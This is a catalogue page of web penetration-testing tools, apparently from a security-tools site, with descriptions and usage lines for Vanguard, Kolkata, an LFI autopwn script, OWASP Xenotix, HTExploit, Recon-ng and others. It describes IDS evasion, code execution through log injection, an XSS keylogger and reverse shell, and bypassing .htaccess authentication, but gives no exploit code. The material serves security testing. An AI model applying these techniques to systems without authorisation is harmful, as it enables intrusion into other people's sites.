Web

Anything related to websites

Halcyon

Generates Kolkata fingerprints for web application identification.
Halcyon is a repository crawler that runs checksums for static files found within a given git repository. After performing a change frequency analysis, it begins recording the checksums with the static files updated the most often and works its way down from there. Using checksum data, the application then generates well-formed version fingerprint signatures in YML format, for easy feeding into kolkata. Additionally, signature output includes revision ID, so it may be possible to find an exact commit for the instance of the application in question.

Dependencies:
git repository software

Usage:
The application may be time-intensive, depending on the volume of files that need to be checksummed and the number of revisions that they may have.

usage: halcyon.py [-h] [-c] -u URL -f FILE -m MATCH
[--omit-directory OMIT_DIRECTORY] [-t TOP]

optional arguments:
-h, --help show this help message and exit
-c, --clone Clone the repo first.
-u URL, -p URL, --url URL, --path URL
Path or URL to the repository.
-f FILE, --file FILE File to search for version information
-m MATCH, --match MATCH
Regex to match line with version number (ie: '^\\\$wp_version = \x27([^']+)\x27;$')
--omit-directory OMIT_DIRECTORY
Comma separated list of directories to omit. (Helpful for removing install directories from signature generation)
-t TOP, --top TOP Top 'n' most-frequently-edited files to use. (0 for unlimited)

Example:
python2 halcyon.py -u https://github.com/WordPress/WordPress.git -c -f wp-version.php -m "^\\\$wp_version = \x27([^']+)\x27;$" -t 1

Vanguard

Vanguard is an extensible utility with module support built for testing different types of web exploitation on a given domain.
Features

Main application features:
Fully Configurable
WebCrawlers crawl all open HTTP and HTTPS ports output from nmap
LibWhisker2 For HTTP IDS Evasion (Same options as nikto)
Tests via GET,POST, and COOKIE

Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection

Usage:
perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap from http://nmap.org installed to run this application correctly.
Protip: You can undo the root requirement by removing the check for root and modifying the nmap configuration.

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from cpan, compile it in, or install it from your distribution's package manager.
YAML
Clone
Notice: You can install these libraries with cpan.

Kolkata

Kolkata is a web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. Kolkata uses session splicing for IDS evasion and configurable checksums of static files in order to determine the version of a web application.

Dependencies
LibWhisker2 - This comes bundled in the tarball, with nikto, and a variety of other tools on this site.
YAML::XS - Install with cpan in bash (cpan -i YAML::XS)

Usage
kolkata.pl -d domain.tld [-v -p [remote_path_to_web_application]]

kolkata requires a directory called sigs in its directory
The sigs directory must contain properly formatted yml files with checksums.

Lfi autopwn.pl

This script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.

Features
Signature-free
Session Splicing
User-Agent and Log injection
Arithmetic Test

Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page

OWASP Xenotix XSS Exploit Framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

htexploit

HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process. By using this tool anyone would be able to list the contents of a directory protected this way, bypassing the authentication process.
The tool provides modularity, by allowing the tester to fully perform an analysis on the protected website of the following attacks: SQL Injection, Local File Inclusion, Remote File Inclusion and others.
The main characteristic of this tool is that all of the analyses performed are done inside the protected directory, not from the publicly accessible site.

Features:
x Multiples modules to execute.
x Save the output to an specify directory.
x HTML Reporting.
x Use multiples wordlist to probe against htaccess bypassing.
x Mode verbose for a full detailed information.
x Recursive crawling engine.

$ python htexploit

H H TTTTTT EEEE l t
H H TT E l ii t
HHHH TT EEE x x ppp l ooo ttt
H H TT E x p p l o o ii t
H H TT EEEE x x ppp l ooo ii tt
p
p v0.77

Usage: htexploit -u [URL] [options]

Options:
-h, --help show this help message and exit
-u URL, --url=URL **REQUIRED** - Specify the URL to scan
-o OUTPUT, --output=OUTPUT
Specify the output directory (Default: Random)
-w WORDLIST, --wordlist=WORDLIST
Specify the wordlist to use (Default: 'res/FullList')
-v, --verbose Verbosity level (Default: 0)

Example Usage:
python htexploit -u somesite.com -w somewordlist_not_included -o folder_to_output

webvulscan

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.

After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

The vulnerabilities tested by WebVulScan are:

Reflected Cross-Site Scripting
Stored Cross-Site Scripting
Standard SQL Injection
Broken Authentication using SQL Injection
Autocomplete Enabled on Password Fields
Potentially Insecure Direct Object References
Directory Listing Enabled
HTTP Banner Disclosure
SSL Certificate not Trusted
Unvalidated Redirects

Features:

Crawler: Crawls a website to identify and display all URLs belonging to the website.
Scanner: Crawls a website and scans all URLs found for vulnerabilities.
Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
Register: Allows a user to register with the web application.
Login: Allows a user to login to the web application.
Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
PDF Generation: Dynamically generates a detailed PDF report.
Report Delivery: The PDF report is emailed to the user as an attachment.

Watcher

Watcher is a Fiddler addon which aims to assist penetration testers in passively finding Web-application vulnerabilities. The security field today has several good choices for HTTP proxies which assist auditors and pen-testers. We chose to implement this as a plugin for Fiddler which already provides the proxy framework for HTTP debugging.

Recon-ng

Recon-ng is a full-featured Web Reconnaisance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, us the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!

Silverlight Spy

Silverlight Spy is a runtime inspector tool providing unprecedented access to all aspects of any Silverlight in-browser, out-of-browser and Windows Phone 7 application. Explore the UI element tree, monitor events, extract XAML, interactively execute DLR code, view statistics and more.

Syndicate content